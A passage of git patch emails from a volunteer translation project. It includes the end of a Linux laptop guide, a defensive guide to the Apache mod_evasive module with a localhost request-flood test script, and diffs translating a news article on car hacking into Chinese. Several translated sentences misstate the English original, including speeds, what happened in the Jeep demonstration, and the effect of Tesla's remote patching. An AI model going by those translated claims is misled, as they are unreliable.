only can let you run 'Linux' easily, but also feature a great display screen that has been praised by many reviewers. If however, you want something cheap, then go with the [Acer Aspire E 15 E5-575G-57D4][6]. As far as 'Linux' compatibility goes, it's almost as good as the Dell, plus it's a great value for the money. + +Thirdly, if you're looking for a laptop to do some gaming on 'Linux', then [Dell Inspiron i5577-7342BLK-PUS][12] looks pretty solid to me. Again, there are many other gaming laptops out there, true, but I specifically chose this one because, it features hardware that are already compatible with 'Linux', although I cannot vouch for the Nvidia GTX 1050 with the same confidence. That said, you shouldn't buy a 'Linux' gaming laptop without wanting to get your hands dirty a bit. In that case, if you're not happy with its hardware capabilities (it's quite capable) and would like to do the research and choose a different one, then by all means do so. + +I wish you good luck with your purchase and thank you for reading! + + +-------------------------------------------------------------------------------- + +via: https://www.hecticgeek.com/2017/12/best-linux-laptop/ + +作者:[Gayan][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.hecticgeek.com/author/gayan/ +[1]:https://www.hecticgeek.com/wp-content/uploads/2017/12/Dell-XPS-9360-Linux.png +[2]:https://www.amazon.com/gp/product/B01LQTXED8?ie=UTF8&tag=flooclea01-20&camp=1789&linkCode=xm2&creativeASIN=B01LQTXED8 +[3]:https://www.hecticgeek.com/wp-content/uploads/2017/12/Dell-XPS-9360-keyboard-the-track-pad.png +[4]:https://www.hecticgeek.com/wp-content/uploads/2017/12/XPS-13.3-ports.png +[5]:https://www.hecticgeek.com/wp-content/uploads/2017/12/Acer-Aspire-E-15-E5-575G-57D4-affordable-linux-laptop.png +[6]:https://www.amazon.com/gp/product/B01LD4MGY4?ie=UTF8&tag=flooclea01-20&camp=1789&linkCode=xm2&creativeASIN=B01LD4MGY4 +[7]:https://www.hecticgeek.com/gnu-linux/ +[8]:https://www.hecticgeek.com/2017/11/ubuntu-17-10-review/ +[9]:https://www.hecticgeek.com/2016/06/motion-interpolation-linux-svp/ +[10]:https://www.hecticgeek.com/2016/04/ubuntu-16-04-lts-review/ +[11]:https://www.hecticgeek.com/wp-content/uploads/2017/12/DELL-Inspiron-15-i5577-5328BLK-linux-gaming-laptop.png +[12]:https://www.amazon.com/gp/product/B06XFC44CL?ie=UTF8&tag=flooclea01-20&camp=1789&linkCode=xm2&creativeASIN=B06XFC44CL +[13]:https://www.hecticgeek.com/wp-content/uploads/2017/12/Trying-to-gather-more-data-about-the-hardware-of-a-Dell-laptop-for-linux.png +[14]:https://askubuntu.com/ +[15]:https://www.hecticgeek.com/wp-content/uploads/2017/12/Trying-to-find-if-the-network-adapter-from-Qualcomm-is-compatible-with-Linux.png +[16]:https://www.hecticgeek.com/wp-content/uploads/2017/12/computer-hardware-illustration.jpg +[17]:https://www.hecticgeek.com/wp-content/uploads/2017/12/Display-Scalling-Settings-on-KDE-Plasma-5.10.5.png +[18]:https://en.wikipedia.org/wiki/Dots_per_inch#Computer_monitor_DPI_standards +[19]:http://pxcalc.com/ +[20]:https://www.hecticgeek.com/wp-content/uploads/2017/12/Using-PXCALC-dpi-calculator.png +[21]:https://www.hecticgeek.com/wp-content/uploads/2016/11/Ubuntu-16.10-vs-Ubuntu-GNOME-16.10-vs-Kubuntu-16.10-vs-Xubuntu-16.10-Memory-Usage-Graph.png +[22]:https://www.hecticgeek.com/2016/11/ubuntu-16-10-flavors-comparison/ +[23]:https://www.hecticgeek.com/wp-content/uploads/2017/07/Kubuntu-16.10-vs-Ubuntu-17.04-vs-Manjaro-17.0.2-KDE-Boot_up-Times-Graph.png +[24]:https://www.hecticgeek.com/2017/07/manjaro-17-0-2-kde-review/ +[25]:https://bumblebee-project.org/ +[26]:https://blogs.gnome.org/uraeus/2016/11/01/discrete-graphics-and-fedora-workstation-25/ +[27]:http://linrunner.de/en/tlp/docs/tlp-linux-advanced-power-management.html +[28]:https://www.hecticgeek.com/wp-content/uploads/2017/11/Ubuntu-17.10-Power-Usage-idle.png +[29]:https://www.hecticgeek.com/wp-content/uploads/2017/11/Ubuntu-17.10-Power-Usage-idle-after-installing-TLP.png +[30]:https://www.hecticgeek.com/2012/02/powerstat-power-calculator-ubuntu-linux/ +[31]:https://kubuntu.org/ +[32]:https://linuxmint.com/ +[33]:https://twitter.com/share +[34]:https://www.hecticgeek.com/2017/12/best-linux-laptop/?share=email (Click to email this to a friend) From 8351cc6cfbe4b4d45dd8b2af4cd7140b4438f1f8 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 17:26:47 +0800 Subject: [PATCH 0552/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Protecting=20Yo?= =?UTF-8?q?ur=20Website=20From=20Application=20Layer=20DOS=20Attacks=20Wit?= =?UTF-8?q?h=20mod?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Application Layer DOS Attacks With mod.md | 221 ++++++++++++++++++ 1 file changed, 221 insertions(+) create mode 100644 sources/tech/20171127 Protecting Your Website From Application Layer DOS Attacks With mod.md diff --git a/sources/tech/20171127 Protecting Your Website From Application Layer DOS Attacks With mod.md b/sources/tech/20171127 Protecting Your Website From Application Layer DOS Attacks With mod.md new file mode 100644 index 0000000000..2bb34b90ef --- /dev/null +++ b/sources/tech/20171127 Protecting Your Website From Application Layer DOS Attacks With mod.md @@ -0,0 +1,221 @@ +Protecting Your Website From Application Layer DOS Attacks With mod +====== +There exist many ways of maliciously taking a website offline. The more complicated methods involve technical knowledge of databases and programming. A far simpler method is known as a "Denial Of Service", or "DOS" attack. This attack derives its name from its goal which is to deny your regular clients or site visitors normal website service. + +There are, generally speaking, two forms of DOS attack; + + 1. Layer 3,4 or Network-Layer attacks. + 2. Layer 7 or Application-Layer attacks. + + + +The first type of DOS attack, network-layer, is when a huge quantity of junk traffic is directed at the web server. When the quantity of junk traffic exceeds the capacity of the network infrastructure the website is taken offline. + +The second type of DOS attack, application-layer, is where instead of junk traffic legitimate looking page requests are made. When the number of page requests exceeds the capacity of the web server to serve pages legitimate visitors will not be able to use the site. + +This guide will look at mitigating application-layer attacks. This is because mitigating networking-layer attacks requires huge quantities of available bandwidth and the co-operation of upstream providers. This is usually not something that can be protected against through configuration of the web server. + +An application-layer attack, at least a modest one, can be protected against through the configuration of a normal web server. Protecting against this form of attack is important because [Cloudflare][1] have [recently reported][2] that the number of network-layer attacks is diminishing while the number of application-layer attacks is increasing. + +This guide will explain using the Apache2 module [mod_evasive][3] by [zdziarski][4]. + +In addition, mod_evasive will stop an attacker trying to guess a username/password combination by attempting hundreds of combinations i.e. a brute force attack. + +Mod_evasive works by keeping a record of the number of requests arriving from each IP address. When this number exceeds one of the several thresholds that IP is served an error page. Error pages require far fewer resources than a site page keeping the site online for legitimate visitors. + +### Installing mod_evasive on Ubuntu 16.04 + +Mod_evasive is contained in the default Ubuntu 16.04 repositories with the package name "libapache2-mod-evasive". A simple `apt-get` will get it installed: +``` +apt-get update +apt-get upgrade +apt-get install libapache2-mod-evasive + +``` + +We now need to configure mod_evasive. + +It's configuration file is located at `/etc/apache2/mods-available/evasive.conf`. By default, all the modules settings are commented after installation. Therefore, the module won't interfere with site traffic until the configuration file has been edited. +``` + + #DOSHashTableSize 3097 + #DOSPageCount 2 + #DOSSiteCount 50 + #DOSPageInterval 1 + #DOSSiteInterval 1 + #DOSBlockingPeriod 10 + + #DOSEmailNotify you@yourdomain.com + #DOSSystemCommand "su - someuser -c '/sbin/... %s ...'" + #DOSLogDir "/var/log/mod_evasive" + + +``` + +The first block of directives mean as follows: + + * **DOSHashTableSize** - The current list of accessing IP's and their request count. + * **DOSPageCount** - The threshold number of page requests per DOSPageInterval. + * **DOSPageInterval** - The amount of time in which mod_evasive counts up the page requests. + * **DOSSiteCount** - The same as the DOSPageCount but counts requests from the same IP for any page on the site. + * **DOSSiteInterval** - The amount of time that mod_evasive counts up the site requests. + * **DOSBlockingPeriod** - The amount of time in seconds that an IP is blocked for. + + + +If the default configuration shown above is used then an IP will be blocked if it: + + * Requests a single page more than twice a second. + * Requests more than 50 pages different pages per second. + + + +If an IP exceeds these thresholds it is blocked for 10 seconds. + +This may not seem like a lot, however, mod_evasive will continue monitoring the page requests even for blocked IP's and reset their block period. As long as an IP is attempting to DOS the site it will remain blocked. + +The remaining directives are: + + * **DOSEmailNotify** - An email address to receive notification of DOS attacks and IP's being blocked. + * **DOSSystemCommand** - A command to run in the event of a DOS. + * **DOSLogDir** - The directory where mod_evasive keeps some temporary files. + + + +### Configuring mod_evasive + +The default configuration is a good place to start as it should not block any legitimate users. The configuration file with all directives (apart from DOSSystemCommand) uncommented looks like the following: +``` + + DOSHashTableSize 3097 + DOSPageCount 2 + DOSSiteCount 50 + DOSPageInterval 1 + DOSSiteInterval 1 + DOSBlockingPeriod 10 + + DOSEmailNotify JohnW@example.com + #DOSSystemCommand "su - someuser -c '/sbin/... %s ...'" + DOSLogDir "/var/log/mod_evasive" + + +``` + +The log directory must be created and given the same owner as the apache process. Here it is created at `/var/log/mod_evasive` and given the owner and group of the Apache web server on Ubuntu `www-data`: +``` +mkdir /var/log/mod_evasive +chown www-data:www-data /var/log/mod_evasive + +``` + +After editing Apache's configuration, especially on a live website, it is always a good idea to check the syntax of the edits before restarting or reloading. This is because a syntax error will stop Apache from re-starting and taking your site offline. + +Apache comes packaged with a helper command that has a configuration syntax checker. Simply run the following command to check your edits: +``` +apachectl configtest + +``` + +If your configuration is correct you will get the response: +``` +Syntax OK + +``` + +However, if there is a problem you will be told where it occurred and what it was, e.g.: +``` +AH00526: Syntax error on line 6 of /etc/apache2/mods-enabled/evasive.conf: +DOSSiteInterval takes one argument, Set site interval +Action 'configtest' failed. +The Apache error log may have more information. + +``` + +If your configuration passes the configtest then the module can be safely enabled and Apache reloaded: +``` +a2enmod evasive +systemctl reload apache2.service + +``` + +Mod_evasive is now configured and running. + +### Testing + +In order to test mod_evasive, we simply need to make enough web requests to the server that we exceed the threshold and record the response codes from Apache. + +A normal, successful page request will receive the response: +``` +HTTP/1.1 200 OK + +``` + +However, one that has been denied by mod_evasive will return the following: +``` +HTTP/1.1 403 Forbidden + +``` + +The following script will make HTTP requests to `127.0.0.1:80`, that is localhost on port 80, as rapidly as possible and print out the response code of every request. + +All you need to do is to copy the following bash script into a file e.g. `mod_evasive_test.sh`: +``` +#!/bin/bash +set -e + +for i in {1..50}; do + curl -s -I 127.0.0.1 | head -n 1 +done + +``` + +The parts of this script mean as follows: + + * curl - This is a command to make web requests. + * -s - Hide the progress meter. + * -I - Only display the response header information. + * head - Print the first part of a file. + * -n 1 - Only display the first line. + + + +Then make it executable: +``` +chmod 755 mod_evasive_test.sh + +``` + +When the script is run **before** mod_evasive is enabled you will see 50 lines of `HTTP/1.1 200 OK` returned. + +However, after mod_evasive is enabled you will see the following: +``` +HTTP/1.1 200 OK +HTTP/1.1 200 OK +HTTP/1.1 403 Forbidden +HTTP/1.1 403 Forbidden +HTTP/1.1 403 Forbidden +HTTP/1.1 403 Forbidden +HTTP/1.1 403 Forbidden +... + +``` + +The first two requests were allowed, but then once a third in the same second was made mod_evasive denied any further requests. You will also receive an email letting you know that a DOS attempt was detected to the address you set with the `DOSEmailNotify` option. + +Mod_evasive is now protecting your site! + +-------------------------------------------------------------------------------- + +via: https://bash-prompt.net/guides/mod_proxy/ + +作者:[Elliot Cooper][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://bash-prompt.net/about/ +[1]:https://www.cloudflare.com +[2]:https://blog.cloudflare.com/the-new-ddos-landscape/ +[3]:https://github.com/jzdziarski/mod_evasive +[4]:https://www.zdziarski.com/blog/ From 053b24533ca9d0a7b9015b0d17788a745c5670b8 Mon Sep 17 00:00:00 2001 From: XiatianSummer Date: Thu, 14 Dec 2017 18:54:57 +0800 Subject: [PATCH 0553/1627] Update 20170607 Why Car Companies Are Hiring Computer Security Experts.md --- ...es Are Hiring Computer Security Experts.md | 64 +++++++++---------- 1 file changed, 32 insertions(+), 32 deletions(-) diff --git a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md index f67a692647..bcbdf21151 100644 --- a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md +++ b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md @@ -1,76 +1,76 @@ Translating by XiatianSummer -Why Car Companies Are Hiring Computer Security Experts +为什么车企纷纷招聘计算机安全专家 ============================================================ Photo ![](https://static01.nyt.com/images/2017/06/08/business/08BITS-GURUS1/08BITS-GURUS1-superJumbo.jpg) -The cybersecurity experts Marc Rogers, left, of CloudFlare and Kevin Mahaffey of Lookout were able to control various Tesla functions from their physically connected laptop. They pose in CloudFlare’s lobby in front of Lava Lamps used to generate numbers for encryption.CreditChristie Hemm Klok for The New York Times +来自 CloudFlare 公司的网络安全专家 Marc Rogers(左)和来自 Lookout 的 Kevin Mahaffey 能够通过直接连接在汽车上的笔记本电脑控制特斯拉的进行许多操作。图为他们在 CloudFlare 的大厅里的的熔岩灯前的合影,这些熔岩灯被用来生成密匙。纽约时报 CreditChristie Hemm Klok拍摄 -It started about seven years ago. Iran’s top nuclear scientists were being assassinated in a string of similar attacks: Assailants on motorcycles were pulling up to their moving cars, attaching magnetic bombs and detonating them after the motorcyclists had fled the scene. +大约在七年前,伊朗的数位顶级核科学家经历过一系列形式类似的暗杀:凶手的摩托车接近他们乘坐的汽车,把磁性炸弹吸附在汽车上,然后逃离并引爆炸弹。 -In another seven years, security experts warn, assassins won’t need motorcycles or magnetic bombs. All they’ll need is a laptop and code to send driverless cars careering off a bridge, colliding with a driverless truck or coming to an unexpected stop in the middle of fast-moving traffic. +安全专家们警告人们,再过 7 年,凶手们不再需要摩托车或磁性炸弹。他们所需要的只是一台笔记本电脑和发送给无人驾驶汽车的一段代码——让汽车坠桥、被货车撞扁或者在高速公路上突然抛锚。 -Automakers may call them self-driving cars. But hackers call them computers that travel over 100 miles an hour. +汽车制造商眼中的无人驾驶汽车。在黑客眼中只是一台可以达到时速 100 公里的计算机。 -“These are no longer cars,” said Marc Rogers, the principal security researcher at the cybersecurity firm CloudFlare. “These are data centers on wheels. Any part of the car that talks to the outside world is a potential inroad for attackers.” +网络安全公司CloudFlare的首席安全研究员马克·罗杰斯(Marc Rogers)说:“它们已经不再是汽车了。它们是装在车轮上的数据中心。从外界接收的每一条数据都可以作为黑客的攻击载体。“ -Those fears came into focus two years ago when two “white hat” hackers — researchers who look for computer vulnerabilities to spot problems and fix them, rather than to commit a crime or cause problems — successfully gained access to a Jeep Cherokee from their computer miles away. They rendered their crash-test dummy (in this case a nervous reporter) powerless over his vehicle and disabling his transmission in the middle of a highway. +两年前,两名“白帽”黑客——寻找系统漏洞并修复它们的研究员,而不是利用漏洞来犯罪的破坏者(Cracker)——成功地在数里之外用电脑获得了一辆 Jeep Cherokee 的控制权。他们控制汽车撞击一个放置在高速公路中央的假人(在场景设定中是一位紧张的记者),直接终止了假人的一生。 -The hackers, Chris Valasek and Charlie Miller (now security researchers respectively at Uber and Didi, an Uber competitor in China), discovered an [electronic route from the Jeep’s entertainment system to its dashboard][10]. From there, they had control of the vehicle’s steering, brakes and transmission — everything they needed to paralyze their crash test dummy in the middle of a highway. +黑客 Chris Valasek 和 Charlie Miller(现在是 Uber 和滴滴的安全研究人员)发现了一条 [由 Jeep 娱乐系统通向仪表板的电路][10]。他们利用这条线路控制了车辆转向、刹车和变速——他们在高速公路上撞击假人所需的一切。 -“Car hacking makes great headlines, but remember: No one has ever had their car hacked by a bad guy,” Mr. Miller wrote on Twitter last Sunday. “It’s only ever been performed by researchers.” +Miller 先生上周日在 Twitter 上写道:“汽车被黑客入侵成为头条新闻,但是人们要清楚,没有人的汽车被坏人入侵过。 这些只是研究人员的测试。” -Still, the research by Mr. Miller and Mr. Valasek came at a steep price for Jeep’s manufacturer, Fiat Chrysler, which was forced to recall 1.4 million of its vehicles as a result of the hacking experiment. +尽管如此,Miller 和 Valasek 的研究使 Jeep 汽车的制造商菲亚特克莱斯勒(Fiat Chrysler)付出了巨大的代价,因为这个安全漏洞,菲亚特克莱斯勒被迫召回了 140 万辆汽车。 -It is no wonder that Mary Barra, the chief executive of General Motors, called cybersecurity her company’s top priority last year. Now the skills of researchers and so-called white hat hackers are in high demand among automakers and tech companies pushing ahead with driverless car projects. +毫无疑问,后来通用汽车首席执行官玛丽·巴拉(Mary Barra)把网络安全作为公司的首要任务。现在,计算机网络安全领域的人才在汽车制造商和高科技公司推进的无人驾驶汽车项目中的需求量很大。 -Uber, [Tesla][11], Apple and Didi in China have been actively recruiting white hat hackers like Mr. Miller and Mr. Valasek from one another as well as from traditional cybersecurity firms and academia. +优步 、[特斯拉][11]、苹果和中国的滴滴一直在积极招聘像 Miller 先生和 Valasek 先生这样的白帽黑客,传统的网络安全公司和学术界也有这样的趋势。 -Last year, Tesla poached Aaron Sigel, Apple’s manager of security for its iOS operating system. Uber poached Chris Gates, formerly a white hat hacker at Facebook. Didi poached Mr. Miller from Uber, where he had gone to work after the Jeep hack. And security firms have seen dozens of engineers leave their ranks for autonomous-car projects. +去年,特斯拉挖走了苹果 iOS 操作系统的安全经理 Aaron Sigel。优步挖走了 Facebook 的白帽黑客 Chris Gates。Miller 先生在发现 Jeep 的漏洞后就职于优步,然后被滴滴挖走。计算机安全领域已经有数十名优秀的工程师加入无人驾驶汽车项目研究的行列。 -Mr. Miller said he left Uber for Didi, in part, because his new Chinese employer has given him more freedom to discuss his work. +Miller 先生说,他离开了优步的一部分原因是滴滴给了他更自由的工作空间。 -“Carmakers seem to be taking the threat of cyberattack more seriously, but I’d still like to see more transparency from them,” Mr. Miller wrote on Twitter on Saturday. +Miller 星期六在 Twitter 上写道:“汽车制造商对待网络攻击的威胁似乎更加严肃,但我仍然希望有更大的透明度。” -Like a number of big tech companies, Tesla and Fiat Chrysler started paying out rewards to hackers who turn over flaws the hackers discover in their systems. GM has done something similar, though critics say GM’s program is limited when compared with the ones offered by tech companies, and so far no rewards have been paid out. +像许多大型科技公司一样,特斯拉和菲亚特克莱斯勒也开始给那些发现并提交漏洞的黑客们提供奖励。通用汽车公司也做了类似的事情,但批评人士认为通用汽车公司的计划与科技公司提供的计划相比诚意不足,迄今为止还收效甚微。 -One year after the Jeep hack by Mr. Miller and Mr. Valasek, they demonstrated all the other ways they could mess with a Jeep driver, including hijacking the vehicle’s cruise control, swerving the steering wheel 180 degrees or slamming on the parking brake in high-speed traffic — all from a computer in the back of the car. (Those exploits ended with their test Jeep in a ditch and calls to a local tow company.) +在 Miller 和 Valasek 发现 Jeep 漏洞的一年后,他们又向人们演示了所有其他可能危害乘客安全的方式,包括劫持车辆的速度控制系统,猛打方向盘或在高速行驶下拉动手刹——这一切都是由汽车外的电脑操作的。(在测试中使用的汽车最后掉进路边的沟渠,他们只能寻求当地拖车公司的帮助) -Granted, they had to be in the Jeep to make all that happen. But it was evidence of what is possible. +虽然他们必须在 Jeep 车上才能做到这一切,但这也证明了入侵的可能性。 -The Jeep penetration was preceded by a [2011 hack by security researchers at the University of Washington][12] and the University of California, San Diego, who were the first to remotely hack a sedan and ultimately control its brakes via Bluetooth. The researchers warned car companies that the more connected cars become, the more likely they are to get hacked. +在 Jeep 被入侵之前,华盛顿大学和加利福尼亚大学圣地亚哥分校的安全研究人员第一个通过蓝牙远程控制轿车并控制其刹车。研究人员警告汽车公司:汽车联网程度越高,被入侵的可能性就越大。 -Security researchers have also had their way with Tesla’s software-heavy Model S car. In 2015, Mr. Rogers, together with Kevin Mahaffey, the chief technology officer of the cybersecurity company Lookout, found a way to control various Tesla functions from their physically connected laptop. +2015年,安全研究人员们发现了入侵高度软件化的特斯拉 Model S 的途径。Rogers 先生和网络安全公司 Lookout 的首席技术官凯文·马哈菲(Kevin Mahaffey)找到了一种通过直接连接在汽车上的笔记本电脑控制特斯拉汽车的方法。 -One year later, a team of Chinese researchers at Tencent took their research a step further, hacking a moving Tesla Model S and controlling its brakes from 12 miles away. Unlike Chrysler, Tesla was able to dispatch a remote patch to fix the security holes that made the hacks possible. +一年后,来自中国腾讯的一支团队做了更进一步的尝试。他们入侵了一辆行驶中的特斯拉 Model S 并控制了其刹车器。和 Jeep 不同,特斯拉可以通过远程安装补丁来修复安全漏洞,这使得黑客的远程入侵也变的可能。 -In all the cases, the car hacks were the work of well meaning, white hat security researchers. But the lesson for all automakers was clear. +以上所有的例子中,入侵者都是无恶意的白帽黑客或者安全研究人员。但是给无人驾驶汽车制造商的教训是惨重的。 -The motivations to hack vehicles are limitless. When it learned of Mr. Rogers’s and Mr. Mahaffey’s investigation into Tesla’s Model S, a Chinese app-maker asked Mr. Rogers if he would be interested in sharing, or possibly selling, his discovery, he said. (The app maker was looking for a backdoor to secretly install its app on Tesla’s dashboard.) +黑客入侵汽车的动机是无穷的。在得知 Rogers 先生和 Mahaffey 先生对特斯拉 Model S 的研究之后,一位中国 app 开发者和他们联系、询问他们是否愿意分享或者出售他们发现的漏洞。(这位 app 开发者正在寻找后门,试图在特斯拉的仪表盘上偷偷安装 app) -Criminals have not yet shown they have found back doors into connected vehicles, though for years, they have been actively developing, trading and deploying tools that can intercept car key communications. +尽管犯罪分子们一直在积极开发、购买、使用能够破解汽车的关键通信数据的工具,但目前还没有证据能够表明犯罪分子们已经找到连接汽车的后门。 -But as more driverless and semiautonomous cars hit the open roads, they will become a more worthy target. Security experts warn that driverless cars present a far more complex, intriguing and vulnerable “attack surface” for hackers. Each new “connected” car feature introduces greater complexity, and with complexity inevitably comes vulnerability. +但随着越来越多的无人驾驶和半自动驾驶的汽车驶入公路,它们将成为更有价值的目标。安全专家警告道:无人驾驶汽车面临着更复杂、更多面的入侵风险,每一辆新无人驾驶汽车的加入,都使这个系统变得更复杂,而复杂性不可避免地带来脆弱性。 -Twenty years ago, cars had, on average, one million lines of code. The General Motors 2010 [Chevrolet Volt][13] had about 10 million lines of code — more than an [F-35 fighter jet][14]. +20年前,平均每辆汽车有100万行代码,通用汽车公司的2010雪佛兰Volt有大约1000万行代码——比一架F-35战斗机的代码还要多。 -Today, an average car has more than 100 million lines of code. Automakers predict it won’t be long before they have 200 million. When you stop to consider that, on average, there are 15 to 50 defects per 1,000 lines of software code, the potentially exploitable weaknesses add up quickly. +如今, 平均每辆汽车至少有1亿行代码。无人驾驶汽车公司预计不久以后它们将有2亿行代码。当你停下来考虑:平均每1000行代码有15到50个缺陷,那么潜在的可利用缺陷就会以很快的速度增加。 -The only difference between computer code and driverless car code is that, “Unlike data center enterprise security — where the biggest threat is loss of data — in automotive security, it’s loss of life,” said David Barzilai, a co-founder of Karamba Security, an Israeli start-up that is working on addressing automotive security. +“计算机最大的安全威胁仅仅是数据被删除,但无人驾驶汽车一旦出现安全事故,失去的却是乘客的生命。”一家致力于解决汽车安全问题的以色列初创公司 Karamba Security 的联合创始人 David Barzilai 说。 -To truly secure autonomous vehicles, security experts say, automakers will have to address the inevitable vulnerabilities that pop up in new sensors and car computers, address inherent vulnerabilities in the base car itself and, perhaps most challenging of all, bridge the cultural divide between automakers and software companies. +安全专家说道:要想真正保障无人驾驶汽车的安全,汽车制造商必须想办法避免所有可能产生的漏洞——即使漏洞不可避免。其中最大的挑战,是汽车制造商和软件开发商们之间的缺乏合作经验。 -“The genie is out of the bottle, and to solve this problem will require a major cultural shift,” said Mr. Mahaffey of the cybersecurity company Lookout. “And an automaker that truly values cybersecurity will treat security vulnerabilities the same they would an airbag recall. We have not seen that industrywide shift yet.” +网络安全公司 Lookout 的 Mahaffey 先生说:“新的革命已经出现,我们不能固步自封,应该寻求新的思维。我们需要像发明出安全气囊那样的人来解决安全漏洞,但我们现在还没有看到行业内有人做出改变。“ -There will be winners and losers, Mr. Mahaffey added: “Automakers that transform themselves into software companies will win. Others will get left behind.” +Mahaffey 先生说:”在这场无人驾驶汽车的竞争中,那些最注重软件的公司将会成为最后的赢家“ -------------------------------------------------------------------------------- via: https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html 作者:[NICOLE PERLROTH ][a] -译者:[译者ID](https://github.com/译者ID) +译者:[XiatianSummer](https://github.com/XiatianSummer) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From cda269f2440f127735ad32e1c81fba6ebcae78e6 Mon Sep 17 00:00:00 2001 From: XiatianSummer Date: Thu, 14 Dec 2017 18:55:31 +0800 Subject: [PATCH 0554/1627] Update 20170607 Why Car Companies Are Hiring Computer Security Experts.md --- ...07 Why Car Companies Are Hiring Computer Security Experts.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md index bcbdf21151..540dbb4160 100644 --- a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md +++ b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md @@ -1,5 +1,3 @@ -Translating by XiatianSummer - 为什么车企纷纷招聘计算机安全专家 ============================================================ From c1fa983fce4238b7580acd34aaf156cb2928e724 Mon Sep 17 00:00:00 2001 From: XiatianSummer Date: Thu, 14 Dec 2017 18:56:58 +0800 Subject: [PATCH 0555/1627] Update 20170607 Why Car Companies Are Hiring Computer Security Experts.md --- ...07 Why Car Companies Are Hiring Computer Security Experts.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md index 540dbb4160..ba5a9e2c2e 100644 --- a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md +++ b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md @@ -3,7 +3,7 @@ Photo ![](https://static01.nyt.com/images/2017/06/08/business/08BITS-GURUS1/08BITS-GURUS1-superJumbo.jpg) -来自 CloudFlare 公司的网络安全专家 Marc Rogers(左)和来自 Lookout 的 Kevin Mahaffey 能够通过直接连接在汽车上的笔记本电脑控制特斯拉的进行许多操作。图为他们在 CloudFlare 的大厅里的的熔岩灯前的合影,这些熔岩灯被用来生成密匙。纽约时报 CreditChristie Hemm Klok拍摄 +来自 CloudFlare 公司的网络安全专家 Marc Rogers(左)和来自 Lookout 的 Kevin Mahaffey 能够通过直接连接在汽车上的笔记本电脑控制特斯拉的进行许多操作。图为他们在 CloudFlare 的大厅里的的熔岩灯前的合影,这些熔岩灯被用来生成密匙。纽约时报 CreditChristie Hemm Klok 拍摄 大约在七年前,伊朗的数位顶级核科学家经历过一系列形式类似的暗杀:凶手的摩托车接近他们乘坐的汽车,把磁性炸弹吸附在汽车上,然后逃离并引爆炸弹。 From 6e43af2ab457ac3bd72ba5e3435fd863566c3d72 Mon Sep 17 00:00:00 2001 From: XiatianSummer Date: Thu, 14 Dec 2017 19:06:25 +0800 Subject: [PATCH 0556/1627] Create 20170607 Why Car Companies Are Hiring Computer Security Experts.md --- ...es Are Hiring Computer Security Experts.md | 91 +++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 translated/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md diff --git a/translated/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md b/translated/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md new file mode 100644 index 0000000000..ba5a9e2c2e --- /dev/null +++ b/translated/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md @@ -0,0 +1,91 @@ +为什么车企纷纷招聘计算机安全专家 +============================================================ + +Photo +![](https://static01.nyt.com/images/2017/06/08/business/08BITS-GURUS1/08BITS-GURUS1-superJumbo.jpg) +来自 CloudFlare 公司的网络安全专家 Marc Rogers(左)和来自 Lookout 的 Kevin Mahaffey 能够通过直接连接在汽车上的笔记本电脑控制特斯拉的进行许多操作。图为他们在 CloudFlare 的大厅里的的熔岩灯前的合影,这些熔岩灯被用来生成密匙。纽约时报 CreditChristie Hemm Klok 拍摄 + +大约在七年前,伊朗的数位顶级核科学家经历过一系列形式类似的暗杀:凶手的摩托车接近他们乘坐的汽车,把磁性炸弹吸附在汽车上,然后逃离并引爆炸弹。 + +安全专家们警告人们,再过 7 年,凶手们不再需要摩托车或磁性炸弹。他们所需要的只是一台笔记本电脑和发送给无人驾驶汽车的一段代码——让汽车坠桥、被货车撞扁或者在高速公路上突然抛锚。 + +汽车制造商眼中的无人驾驶汽车。在黑客眼中只是一台可以达到时速 100 公里的计算机。 + +网络安全公司CloudFlare的首席安全研究员马克·罗杰斯(Marc Rogers)说:“它们已经不再是汽车了。它们是装在车轮上的数据中心。从外界接收的每一条数据都可以作为黑客的攻击载体。“ + +两年前,两名“白帽”黑客——寻找系统漏洞并修复它们的研究员,而不是利用漏洞来犯罪的破坏者(Cracker)——成功地在数里之外用电脑获得了一辆 Jeep Cherokee 的控制权。他们控制汽车撞击一个放置在高速公路中央的假人(在场景设定中是一位紧张的记者),直接终止了假人的一生。 + +黑客 Chris Valasek 和 Charlie Miller(现在是 Uber 和滴滴的安全研究人员)发现了一条 [由 Jeep 娱乐系统通向仪表板的电路][10]。他们利用这条线路控制了车辆转向、刹车和变速——他们在高速公路上撞击假人所需的一切。 + +Miller 先生上周日在 Twitter 上写道:“汽车被黑客入侵成为头条新闻,但是人们要清楚,没有人的汽车被坏人入侵过。 这些只是研究人员的测试。” + +尽管如此,Miller 和 Valasek 